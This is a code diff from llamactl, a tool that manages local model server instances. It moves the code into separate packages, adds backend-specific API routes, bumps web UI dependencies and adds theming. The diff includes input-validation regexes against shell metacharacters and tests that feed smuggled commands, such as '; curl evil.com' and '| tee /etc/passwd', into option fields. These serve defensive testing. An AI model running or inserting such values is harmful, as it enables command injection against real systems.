w.WriteHeader(http.StatusOK)
}))
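
For reference, a minimal sketch of wiring the renamed middleware outside of tests. The "llamactl/pkg/config" and "llamactl/pkg/server" import paths, the key value, and the port are assumptions based on the pkg/ layout visible in this change, not part of the diff itself:

package main

import (
	"net/http"

	"llamactl/pkg/config" // assumed import path
	"llamactl/pkg/server" // assumed import path
)

func main() {
	// Require a management key for all routes behind this handler.
	cfg := config.AuthConfig{
		RequireManagementAuth: true,
		ManagementKeys:        []string{"example-management-key"}, // placeholder key
	}
	middleware := server.NewAPIAuthMiddleware(cfg)

	mux := http.NewServeMux()
	mux.Handle("/", middleware.AuthMiddleware(server.KeyTypeManagement)(
		http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			w.WriteHeader(http.StatusOK)
		}),
	))
	_ = http.ListenAndServe(":8080", mux)
}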


@@ -1,4 +1,4 @@
package llamactl
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`


@@ -1,4 +1,4 @@
package llamactl
package server
import (
"fmt"
@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs"
_ "llamactl/apidocs"
"llamactl/webui"
)
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Add CORS middleware
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.config.Server.AllowedOrigins,
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
ExposedHeaders: []string{"Link"},
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
}))
// Add API authentication middleware
authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
if handler.config.Server.EnableSwagger {
if handler.cfg.Server.EnableSwagger {
r.Get("/swagger/*", httpSwagger.Handler(
httpSwagger.URL("/swagger/doc.json"),
))
@@ -38,14 +38,26 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Define routes
r.Route("/api/v1", func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
}
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler())
r.Get("/version", handler.VersionHandler())
r.Get("/devices", handler.ListDevicesHandler())
r.Get("/version", handler.VersionHandler()) // Get server version
// Backend-specific endpoints
r.Route("/backends", func(r chi.Router) {
r.Route("/llama-cpp", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
r.Post("/parse-command", handler.ParseLlamaCommand())
})
r.Route("/mlx", func(r chi.Router) {
r.Post("/parse-command", handler.ParseMlxCommand())
})
r.Route("/vllm", func(r chi.Router) {
r.Post("/parse-command", handler.ParseVllmCommand())
})
})
// Instance management endpoints
@@ -73,7 +85,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Route(("/v1"), func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}
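
A minimal sketch of exercising one of the new backend routes once this router is mounted. The host, port, and disabled management auth are assumptions for illustration, not part of this change:

package main

import (
	"fmt"
	"io"
	"net/http"
)

func main() {
	// New route added above: GET /api/v1/backends/llama-cpp/version
	resp, err := http.Get("http://localhost:8080/api/v1/backends/llama-cpp/version")
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(body))
}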

pkg/testutil/helpers.go

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}
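
A short sketch of how these helpers are meant to be used when building option structs in tests, mirroring the validation tests later in this change:

package example

import (
	"llamactl/pkg/instance"
	"llamactl/pkg/testutil"
)

// buildOptions shows the pointer helpers in use when constructing
// CreateInstanceOptions for tests.
func buildOptions() *instance.CreateInstanceOptions {
	return &instance.CreateInstanceOptions{
		AutoRestart:  testutil.BoolPtr(true),
		MaxRestarts:  testutil.IntPtr(5),
		RestartDelay: testutil.IntPtr(10),
	}
}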


@@ -1,116 +0,0 @@
package llamactl
import (
"fmt"
"reflect"
"regexp"
)
// Simple security validation that focuses only on actual injection risks
var (
// Block shell metacharacters that could enable command injection
dangerousPatterns = []*regexp.Regexp{
regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters
regexp.MustCompile(`\$\(.*\)`), // Command substitution $(...)
regexp.MustCompile("`.*`"), // Command substitution backticks
regexp.MustCompile(`[\x00-\x1F\x7F]`), // Control characters (including newline, tab, null byte, etc.)
}
// Simple validation for instance names
validNamePattern = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
)
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
}
}
return nil
}
// ValidateInstanceOptions performs minimal security validation
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation - only check for reasonable ranges
if options.Port < 0 || options.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range"))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
}
if val.Kind() != reflect.Struct {
return nil
}
typ := val.Type()
for i := 0; i < val.NumField(); i++ {
field := val.Field(i)
fieldType := typ.Field(i)
if !field.CanInterface() {
continue
}
fieldName := fieldType.Name
if fieldPath != "" {
fieldName = fieldPath + "." + fieldName
}
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}
}
return nil
}
func ValidateInstanceName(name string) error {
// Validate instance name
if name == "" {
return ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return nil
}


@@ -0,0 +1,174 @@
package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
// Simple security validation that focuses only on actual injection risks
var (
// Block shell metacharacters that could enable command injection
dangerousPatterns = []*regexp.Regexp{
regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters
regexp.MustCompile(`\$\(.*\)`), // Command substitution $(...)
regexp.MustCompile("`.*`"), // Command substitution backticks
regexp.MustCompile(`[\x00-\x1F\x7F]`), // Control characters (including newline, tab, null byte, etc.)
}
// Simple validation for instance names
validNamePattern = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
)
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
}
}
return nil
}
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
}
if val.Kind() != reflect.Struct {
return nil
}
typ := val.Type()
for i := 0; i < val.NumField(); i++ {
field := val.Field(i)
fieldType := typ.Field(i)
if !field.CanInterface() {
continue
}
fieldName := fieldType.Name
if fieldPath != "" {
fieldName = fieldPath + "." + fieldName
}
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}
}
return nil
}
func ValidateInstanceName(name string) (string, error) {
// Validate instance name
if name == "" {
return "", ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return name, nil
}
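
A minimal usage sketch for the new validation package, using only identifiers that appear in this change; the model path and port are placeholders:

package main

import (
	"fmt"

	"llamactl/pkg/backends"
	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/instance"
	"llamactl/pkg/validation"
)

func main() {
	// Validate a user-supplied instance name; the validated name is returned.
	name, err := validation.ValidateInstanceName("my-instance")
	if err != nil {
		panic(err)
	}

	// Validate backend-specific options; shell metacharacters in any string
	// field are rejected by the injection checks above.
	opts := &instance.CreateInstanceOptions{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf", // placeholder
			Port:  8080,                  // placeholder
		},
	}
	if err := validation.ValidateInstanceOptions(opts); err != nil {
		panic(err)
	}
	fmt.Println("validated:", name)
}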


@@ -1,10 +1,13 @@
package llamactl_test
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +42,23 @@ func TestValidateInstanceName(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceName(tt.input)
name, err := validation.ValidateInstanceName(tt.input)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
}
if tt.wantErr {
return // Skip further checks if we expect an error
}
// If no error, check that the name is returned as expected
if name != tt.input {
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
}
})
}
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := llamactl.ValidateInstanceOptions(nil)
err := validation.ValidateInstanceOptions(nil)
if err == nil {
t.Error("Expected error for nil options")
}
@@ -73,13 +83,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -126,13 +137,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -163,13 +175,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -181,13 +194,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *llamactl.CreateInstanceOptions
options *instance.CreateInstanceOptions
wantErr bool
}{
{
name: "injection in model field",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -196,8 +210,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -206,8 +221,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -221,7 +237,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceOptions(tt.options)
err := validation.ValidateInstanceOptions(tt.options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -231,11 +247,12 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &llamactl.CreateInstanceOptions{
AutoRestart: boolPtr(true),
MaxRestarts: intPtr(5),
RestartDelay: intPtr(10),
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
@@ -247,17 +264,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}
}
// Helper functions for pointer fields
func boolPtr(b bool) *bool {
return &b
}
func intPtr(i int) *int {
return &i
}

webui/package-lock.json

@@ -19,6 +19,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -42,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
},
@@ -2109,6 +2110,60 @@
"node": ">=14.0.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/core": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/wasi-threads": "1.0.2",
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/runtime": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/wasi-threads": {
"version": "1.0.2",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@napi-rs/wasm-runtime": {
"version": "0.2.11",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/core": "^1.4.3",
"@emnapi/runtime": "^1.4.3",
"@tybys/wasm-util": "^0.9.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@tybys/wasm-util": {
"version": "0.9.0",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/tslib": {
"version": "2.8.0",
"inBundle": true,
"license": "0BSD",
"optional": true
},
"node_modules/@tailwindcss/oxide-win32-arm64-msvc": {
"version": "4.1.11",
"resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.1.11.tgz",
@@ -4190,10 +4245,13 @@
}
},
"node_modules/fdir": {
"version": "6.4.6",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.4.6.tgz",
"integrity": "sha512-hiFoqpyZcfNm1yc4u8oWCf9A2c4D3QjCrks3zmoVKVxpQRzmPNar1hUJcBG2RQHvEVGDN+Jm81ZheVLAQMK6+w==",
"version": "6.5.0",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
"integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
"license": "MIT",
"engines": {
"node": ">=12.0.0"
},
"peerDependencies": {
"picomatch": "^3 || ^4"
},
@@ -6693,6 +6751,16 @@
"node": ">=18"
}
},
"node_modules/sonner": {
"version": "2.0.7",
"resolved": "https://registry.npmjs.org/sonner/-/sonner-2.0.7.tgz",
"integrity": "sha512-W6ZN4p58k8aDKA4XPcx2hpIQXBRAgyiWVkYhT7CvK6D3iAu7xjvVyhQHg2/iaKJZ1XVJ4r7XuwGL+WGEK37i9w==",
"license": "MIT",
"peerDependencies": {
"react": "^18.0.0 || ^19.0.0 || ^19.0.0-rc",
"react-dom": "^18.0.0 || ^19.0.0 || ^19.0.0-rc"
}
},
"node_modules/source-map-js": {
"version": "1.2.1",
"resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
@@ -6973,13 +7041,13 @@
"license": "MIT"
},
"node_modules/tinyglobby": {
"version": "0.2.14",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.14.tgz",
"integrity": "sha512-tX5e7OM1HnYr2+a2C/4V0htOcSQcoSTH9KgJnVvNm5zm/cyEWKJ7j7YutsH9CxMdtOkkLFy2AHrMci9IM8IPZQ==",
"version": "0.2.15",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.15.tgz",
"integrity": "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==",
"license": "MIT",
"dependencies": {
"fdir": "^6.4.4",
"picomatch": "^4.0.2"
"fdir": "^6.5.0",
"picomatch": "^4.0.3"
},
"engines": {
"node": ">=12.0.0"
@@ -7356,17 +7424,17 @@
}
},
"node_modules/vite": {
"version": "7.0.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.0.5.tgz",
"integrity": "sha512-1mncVwJxy2C9ThLwz0+2GKZyEXuC3MyWtAAlNftlZZXZDP3AJt5FmwcMit/IGGaNZ8ZOB2BNO/HFUB+CpN0NQw==",
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",
"fdir": "^6.4.6",
"picomatch": "^4.0.2",
"fdir": "^6.5.0",
"picomatch": "^4.0.3",
"postcss": "^8.5.6",
"rollup": "^4.40.0",
"tinyglobby": "^0.2.14"
"rollup": "^4.43.0",
"tinyglobby": "^0.2.15"
},
"bin": {
"vite": "bin/vite.js"


@@ -28,6 +28,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -51,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
}


@@ -7,6 +7,8 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
import { Toaster } from "sonner";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -29,9 +31,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) {
updateInstance(editingInstance.name, options);
void updateInstance(editingInstance.name, options);
} else {
createInstance(name, options);
void createInstance(name, options);
}
};
@@ -42,44 +44,52 @@ function App() {
// Show loading spinner while checking auth
if (authLoading) {
return (
<div className="min-h-screen bg-gray-50 flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading...</p>
<ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading...</p>
</div>
</div>
</div>
</ThemeProvider>
);
}
// Show login dialog if not authenticated
if (!isAuthenticated) {
return (
<div className="min-h-screen bg-gray-50">
<LoginDialog open={true} />
</div>
<ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} />
</div>
</ThemeProvider>
);
}
// Show main app if authenticated
return (
<div className="min-h-screen bg-gray-50">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<ThemeProvider>
<div className="min-h-screen bg-background">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
<Toaster />
</div>
</ThemeProvider>
);
}


@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
]
beforeEach(() => {
@@ -55,6 +56,21 @@ describe('App Component - Critical Business Logic Only', () => {
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
})
afterEach(() => {
@@ -66,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const newInstance: Instance = {
name: 'new-test-instance',
running: false,
options: { model: 'new-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
}
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -90,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -103,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const updatedInstance: Instance = {
name: 'test-instance-1',
running: false,
options: { model: 'updated-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
}
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -123,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
})
})
})
@@ -142,7 +160,7 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getAllByTitle('Start instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Stop instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Edit instance').length).toBe(2)
expect(screen.getAllByTitle('Delete instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('More actions').length).toBe(2)
})
it('delete confirmation calls correct API', async () => {
@@ -156,8 +174,17 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getByText('test-instance-1')).toBeInTheDocument()
})
